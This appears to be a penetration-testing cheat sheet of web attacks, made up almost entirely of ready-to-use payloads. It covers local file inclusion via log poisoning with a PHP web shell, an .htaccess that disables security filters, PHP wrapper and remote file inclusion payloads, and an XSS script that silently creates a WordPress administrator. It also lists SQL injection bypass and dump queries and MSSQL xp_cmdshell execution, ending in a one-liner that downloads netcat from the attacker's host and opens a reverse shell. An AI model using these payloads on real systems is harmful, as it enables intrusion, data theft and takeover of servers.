Web Attack

Local File Inclusion (LFI)

Log Poisoning

1

Find the log file

curl <Domain Name>?page=../../../../../../../../<Path To Log File>

2

Access the website and forward that request to Repeater in BurpSuite

3

Replace User Agent with the following

<?php echo system($_GET['cmd']); ?>

4

Send the request

5

Remove the entire User Agent field in the subsequent request

6

Attack

<Domain Name>?page=../../../../../../../../<Path To Log File>&cmd=<Command>

File Uploads

1

Create a reverse shell

2

Upload the file

3

Access the file

4

If uploading or accessing the file fails

Create a .htacess file with the following content

# Allow access to all file types, including potentially dangerous ones
AddType application/octet-stream .exe .ps1 .bat .sh .php5 .php7 .php .phtml .pl .py
AddHandler application/x-httpd-php .php .php5 .php7 .phtml

# Override any restrictive settings
Options +Indexes +ExecCGI
AllowOverride All
Require all granted

# Disable mod_security and other restrictions (if supported)
<IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
</IfModule>

# Enable uploads with any extension (if used with web apps)
<FilesMatch ".*">
    Order allow,deny
    Allow from all
</FilesMatch>

Upload this file.

NOTE: This only works if the server is Apache, and .htaccess is enabled

PHP Wrappers

curl <Domain Name>?page=php://filter/convert.base64-encode/resource=<Path To File>

curl "<Domain Name>?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=<Command in URL encoding>"

Remote File Inclusion (RFI)

curl "<Domain Name>?page=http://<Kali IP Address>/<Reverse Shell File>"

XSS

1

Compress the functions using JScompress

var ajaxRequest = new XMLHttpRequest();
var requestURL = "/wp-admin/user-new.php"; // Replace with the actual endpoint
var nonceRegex = /ser" value="([^"]*?)"/g;
ajaxRequest.open("GET", requestURL, false);
ajaxRequest.send();
var nonceMatch = nonceRegex.exec(ajaxRequest.responseText);
var nonce = nonceMatch[1];
var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=attacker&email=hacker@test.com&pass1=hacker&pass2=hacker&role=administrator";
ajaxRequest = new XMLHttpRequest();
ajaxRequest.open("POST", requestURL, true);
ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
ajaxRequest.send(params);

2

Convert the compressed JavaScript to UTF-16

function encode_to_javascript(string) {
    var input = string
    var output = '';
    for(pos = 0; pos < input.length; pos++) {
        output += input.charCodeAt(pos);
        if(pos != (input.length - 1)) {
            output += ",";
        }
    }
    return output;
}
let encoded = encode_to_javascript('insert_minified_javascript')
console.log(encoded)

3

Attack

curl -i <Domain Name> --user-agent "<script>eval(String.fromCharCode(<UTF-16 Encoded String>))</script>"

SQL Injection (SQLi)

SQL Injection Cheat Sheet

SQLi Authentication Bypass

<Username>' OR 1=1-- //
'OR '' = '
<Username>'-- //
' union select 1, '<Username Field>', '<Pass Field>' 1-- //
'OR 1=1-- //
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); -- //
1 or 1=1
1' or '1'='1

MySQL

-- Info
SELECT version();
SELECT system_user();

-- DB Enumeration
SHOW DATABASES;
USE <db_name>;
SHOW TABLES;
DESCRIBE users;
SELECT * FROM test.users;

-- Credential Extraction
SELECT user, authentication_string FROM mysql.user WHERE user = 'test';

MSSQL

-- Info
SELECT @@version;
SELECT name FROM sys.databases;
SELECT * FROM offsec.information_schema.tables;
SELECT * FROM testuser.dbo.users;

-- Example users
admin : lab
guest : guest

PostgreSQL

SELECT version();
SELECT current_user;
SELECT current_database();
SELECT datname FROM pg_database;
SELECT tablename FROM pg_tables WHERE schemaname='public';
SELECT column_name FROM information_schema.columns WHERE table_name='users';

MongoDB (NoSQL Injection)

-- REST param bypass
username=admin'&password[$ne]=1

-- JSON-style
{ "username": {"$ne": null}, "password": {"$ne": null} }
{ "$where": "this.password.length < 100" }

Error-Based SQLi

tom' OR 1=1 -- //
' or 1=1 in (select @@version) -- //
' OR 1=1 in (SELECT * FROM users) -- //
' or 1=1 in (SELECT password FROM users) -- //
' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //W

Union-Based SQLi

-- 1) Find number of columns
' ORDER BY 1-- //

-- 2) Basic Union Extraction
%' UNION SELECT database(), user(), @@version, null, null -- //
' UNION SELECT null, null, database(), user(), @@version  -- //

-- 3) Enumerate DB objects
' UNION SELECT null, table_name, column_name, table_schema, null FROM information_schema.columns WHERE table_schema=database() -- //

-- 4) Dump User Info
' UNION SELECT null, username, password, description, null FROM users -- //

Manual Code Execution in MSSQL

-- Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Run Command
EXEC xp_cmdshell '<command>';

-- Examples
'; EXEC xp_cmdshell 'whoami'; -- //
'; EXEC xp_cmdshell 'dir C:\Users'; -- //
'; EXEC xp_cmdshell 'ping 192.168.45.165'; -- //

Encoded Examples

%27%3B%20EXEC%20sp_configure%20%22show%20advanced%20options%22%2C%201%3B%20--%20%2F%2F
%27%3B%20EXEC%20xp_cmdshell%20%22whoami%22%3B%20--%20%2F%2F

One-Liner Reverse Shell (MSSQL)

'; EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "curl http://<Kali IP Address>/nc64.exe -o C:\\Users\\Public\\nc64.exe"; EXEC xp_cmdshell "C:\\Users\\Public\\nc64.exe <Kali IP Address> <Kali Port> -e cmd.exe"; -- //